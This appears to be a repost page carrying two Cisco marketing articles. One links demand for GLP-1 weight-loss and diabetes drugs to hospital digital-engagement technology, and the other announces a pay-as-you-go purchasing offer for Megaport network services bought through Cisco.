    The new category of Diabetes, weight loss and obesity drugs called GLP-1s is predicted to be a game-changing innovation in population health management of some chronic disease types.  These drugs have shown tremendous success in treating their target diseases of Diabetes and Obesity, and adoption by patients continues to grow. The 42nd annual J.P. Morgan healthcare conference in San Francisco this month gave considerable coverage to this topic and to the group of pharmaceutical companies at the core of this unparalleled movement in reducing population health issues around diabetes and weight. Drugs such as Wegovy, Mounjaro and Ozempic are currently the most highly in demand and many patients are having trouble finding supply as a result of the accelerating adoption and approvals for use. But innovation in pharma can create opportunity in other areas, and this one is already doing just that for hospitals, clinics and ACOs in the healthcare industry.

    Analysts Forecast Massive Growth


    Chris Schott, JP Morgan Sr. Analyst covering US Diversified Biopharma says the revenue opportunity for the pharma sector could be as much as $100B as we approach 2030 which would make it the largest therapeutic market they have ever seen.  He further predicts the capacity for GLP-1s to double in 2024 and increase another 50% in 2025, alleviating bottlenecks from a capacity standpoint.

    Lisa Gill, JP Morgan Sr. Analyst covering Healthcare services says things to watch are policies around coverage of these drugs. They are not currently covered by Medicaid or Medicare and should that change, volumes would likely be impacted even further.

    Seizing the Opportunity in GLP-1


    So, what does this mean for healthcare provider organizations?  This is where accelerating healthcare’s digital transformation comes into the equation. The opportunity is huge for providers to realize significant increases in volumes of patients seeking primary care services to authorize, prescribe and manage the use of these medical treatments. These GLP-1 patients will need to be evaluated and monitored throughout their use of these medications and the current staffing levels within the US healthcare system are already strained with patients experiencing delays in appointments, long wait times for scheduling appointments and ongoing challenges in reporting daily vitals into the electronic health records without in-person visits. In addition to tracking vitals, these patients are ideally monitored for lifestyle elements such as sleep, exercise, diet, mental health and overall wellness. They benefit from coaching to help keep them on track with the lifestyle changes that go along with a successful program.

    Maximizing Patient Engagement for Financial Growth and Innovation


    Providers who have invested in digital-first engagement technologies such as messaging, chat, bots, voice and efficient patient orchestration processes using integrated contact centers will be best poised to handle the volumes of patients seeking care and will see the financial benefits of engaging and servicing these patient’s needs.

    Healthcare providers, overwhelmingly experiencing financial challenges stemming from COVID era dips in billable visits and procedures, have been exploring ways to expand into new types of care and new sources of patients. The innovation and success of the GLP-1 category of pharmaceuticals could be one of the opportunities that provides both, and drives acceleration of new care models, digital workflow re-designs and remote patient monitoring. Providers will need to evaluate their infrastructure’s readiness for some of these new engagement models and quickly deploy technologies to capture this new business opportunity.  The good news is Cisco’s Healthcare team is already helping hospital systems deploy next generation collaboration systems including messaging, video conferencing, virtual care, and devices that are interoperable with other collaboration systems, for affordability and ease of use with existing systems and processes.

    Experts predict more innovation in the pharmaceutical pipelines that will produce huge gains for other disease types too. Is your hospital system ready with a digital healthcare infrastructure that seamlessly engages patients, scales your valuable clinical resources and secures operations? The time to start is now!

    Source: cisco.com

    Saturday, 10 February 2024

    Cisco and Megaport Simplify Cloud Networking with Pay-As-You-Go Model

    In the ever-evolving world of digital connectivity, Cisco continues to pave the way with innovative solutions not just centered around technological advances, but also around how those advances can easily be consumed by customers. Over the last three years, Cisco and Megaport have collaborated deeply by:

    1. Integrating Cisco Catalyst SD-WAN with Megaport global network connectivity services (Megaport Virtual Edge and Megaport Virtual Cross Connects)

    2. Delivering a single vendor consumption model for customers to purchase Megaport services via Cisco (available since September 2021 on Cisco Global Price List)

    Cisco’s Pay-as-You-Go Initiative


    Today, we are happy to announce that Cisco and Megaport are extending their partnership by introducing a pay-as-you-go (PAYG) offer for Megaport Virtual Edge, Virtual Cross Connects, and Ports through Cisco’s Global Price List. As an alternative to the existing term-based offer, Cisco’s pay-as-you-go offer provides businesses with unprecedented flexibility, scalability, and a cloud-like consumption model for Megaport underlay services.

    Cisco’s PAYG offer for Megaport services is a dynamic approach to network resource management. It is designed to ensure businesses only pay for the infrastructure resources they utilize, providing an efficient and economical solution. This model signifies a shift from the traditional, static network infrastructure to a more dynamic, flexible, and cost-effective alternative. The pay-as-you-go offer will be available in March 2024 and will be integrated with Megaport Virtual Edge, Megaport Virtual Cross Connects, and Megaport Ports.

    Both consumption models give customers a single vendor experience for their global connectivity requirements through Catalyst SD-WAN Manager, allowing them to bring up network infrastructure to create global wide area networks, connect to multiple cloud environments, and setup easy data recovery systems in a matter of minutes. There’s no need for customers to deal with multiple vendors, manage various contracts, or navigate multiple portals.

    Key Benefits of Cisco’s PAYG for Megaport Services


    Currently adopted by a wide variety of business verticals (healthcare, tech, global IT services, financial services, and public sectors), middle-mile optimization with Catalyst SD-WAN and Megaport, allows businesses to realize a range of benefits.

    Cisco and Megaport Simplify Cloud Networking with Pay-As-You-Go Model

    • Flexibility and scalability: The PAYG offer allows for dynamic scaling of network connectivity, thus creating a cloud-like consumption model for site-to-cloud, site-to-site, and cloud-to-cloud connectivity requirements. This flexibility is crucial in today’s ever-changing business environment, where adaptability, agility, and ease of use are key determinants of success.
    • Cost-effectiveness: Organizations can manage their network resources based on their specific requirements and only pay for the resources they consume. With a $0 upfront commitment and a single billing and support platform, Cisco aims to reduce the multi-vendor requisite customers must deal with for their global networking infrastructure needs.
    • Secure and reliable: By leveraging Megaport’s robust global platform with a 99.999% SLA, businesses can enjoy seamless, secure connections to a vast network of service providers (data centers, public clouds, and SaaS) in a colocation-agnostic manner, while Catalyst SD-WAN ensures end-to-end encryption for data at rest and data in transit.
    • Global WAN: Megaport’s extensive global footprint allows businesses to deploy Megaport Virtual Edge hosting the Catalyst 8000V in 70+ metros across the globe, giving users access to Megaport’s backbone in a data center agnostic manner. Multi-national enterprises have deployed resilient and responsive global WANs in a manner of minutes using Catalyst SD-WAN and Megaport underlays, thus empowering them to do away with their legacy networks, long term contracts, and the insecurities of using public internet services. This global reach, combined with Cisco’s Catalyst SD-WAN, enables organizations to create a truly borderless and responsive network infrastructure.

    Cisco and Megaport Simplify Cloud Networking with Pay-As-You-Go Model

    Cisco’s launch of the pay-as-you-go offer for Megaport services delivers unparalleled flexibility, scalability, and cost-efficiency to organizations looking to modernize their global network infrastructure while transforming to a cloud-first environment by providing a network that mimics the same.

    Source: cisco.com